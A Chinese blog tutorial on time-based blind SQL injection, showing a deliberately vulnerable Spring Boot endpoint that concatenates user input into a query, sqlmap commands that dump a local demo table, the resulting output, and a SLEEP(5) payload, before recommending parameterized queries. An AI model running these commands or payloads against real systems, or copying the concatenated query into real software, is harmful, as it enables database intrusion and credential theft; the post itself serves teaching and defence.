SQL注入:时间盲注

  • 开发
  • 23

SQL注入:时间盲注

SQL 时间盲注是一种利用数据库的延迟来判断查询结果的技术。主要用到sleep() 函数

前面讲到基于错误注入,对应的接口没有返回值不能继续下去,但是如果接口有返回值呢?

先决条件

  • 进行了统一异常处理
  • 采用字符串拼接的方式
  • 访问的接口有对应的返回值
@PostMapping("wrong")
    public List wrong(@RequestParam("username") String username) {
        //curl -X POST http://localhost:18081/time-based/wrong?username=test
        //python sqlmap.py -u  http://localhost:18081/time-based/wrong --data username=test --current-db --flush-session
        //python sqlmap.py -u  http://localhost:18081/time-based/wrong --data username=test --tables -D "sqlinject"
        //python sqlmap.py -u  http://localhost:18081/time-based/wrong --data username=test -D "sqlinject" -T "users_time" --dump

        List list = jdbcTemplate.queryForList("SELECT id,username FROM users_time WHERE username LIKE '%" + username + "%'");
        log.info("{}", list);

        return list;
    }

使用sqlmap进行注入攻击

C:\Python310\sqlmap>python sqlmap.py -u  http://localhost:18081/time-based/wrong --data username=test -D "sqlinject" -T "users_time" --dump
...........................

# 可以看到提示 time-based blind 可以进行注入
[09:48:54] [INFO] POST parameter 'username' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
............................................
[09:49:03] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.6
[09:49:03] [INFO] fetching columns for table 'users_time' in database 'sqlinject'
[09:49:03] [INFO] fetching entries for table 'users_time' in database 'sqlinject'
Database: sqlinject
Table: users_time
[3 entries]
+----+----------+----------+
| id | password | username |
+----+----------+----------+
| 1  | haha1    | test1    |
| 2  | haha2    | test2    |
| 3  | 123456   | kevin    |
+----+----------+----------+

[09:49:04] [INFO] table 'sqlinject.users_time' dumped to CSV file 'C:\Users\admin\AppData\Local\sqlmap\output\localhost\dump\sqlinject\users_time.csv'


C:\Python310\sqlmap>

可以看到,可以将完整的库拖下来,注入攻击成功了。

Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: username=test%' AND (SELECT 1974 FROM (SELECT(SLEEP(5)))sXjh) AND 'gPKK%'='gPKK
  • 注入的过程,就是枚举字符,暴力破解

从查询结果中截取第一个字符,转换成ASCLL码,从32开始判断,递增至126。

如果响应时间超过5秒,说明字符内容判断正确;
如果响应时间不超过5秒(正常响应),说明字符内容判断错误,递增猜解该字符的其他可能性。

第一个字符猜解成功后,依次猜解第二个、第三个……第n个(n表示返回结果的长度)。

所以即使屏蔽了错误信息,也不能达到防止注入。最优的解决办法还是要参数化,采用占位符的信息替换。

阅读全部

相关推荐

  2. SQL注入时间

    2024-07-12 14:02:02       24 阅读

  4. SQL注入攻击 - 基于时间

    2024-07-12 14:02:02       60 阅读

  7. 布尔+时间+堆叠注入

    2024-07-12 14:02:02       42 阅读

最近更新

  3. docker php8.1+nginx base 镜像 dockerfile 配置

    2024-07-12 14:02:02       66 阅读

  4. Could not load dynamic library ‘cudart64_100.dll‘

    2024-07-12 14:02:02       70 阅读

  9. 在Django里面运行非项目文件

    2024-07-12 14:02:02       57 阅读

  19. Python语言-面向对象

    2024-07-12 14:02:02       68 阅读

  20. 如何分清楚常见的 Git 分支管理策略Git Flow、GitHub Flow 和 GitLab Flow

    2024-07-12 14:02:02       62 阅读

热门阅读

  4. Mybatis插件:IDEA中MyBatisCodeHelperPro插件下载安装

    2024-07-12 14:02:02       16 阅读

  5. spark中的floor函数

    2024-07-12 14:02:02       21 阅读

  9. 数据结构第21节 归并排序以及优化方案

    2024-07-12 14:02:02       20 阅读

  17. 手撕红黑树

    2024-07-12 14:02:02       20 阅读

  20. python程序打包.exe文件

    2024-07-12 14:02:02       21 阅读

  27. vue3+antd+g2plot快速入门

    2024-07-12 14:02:02       24 阅读

  30. 硬件产品经理:电子产品加工成本

    2024-07-12 14:02:02       22 阅读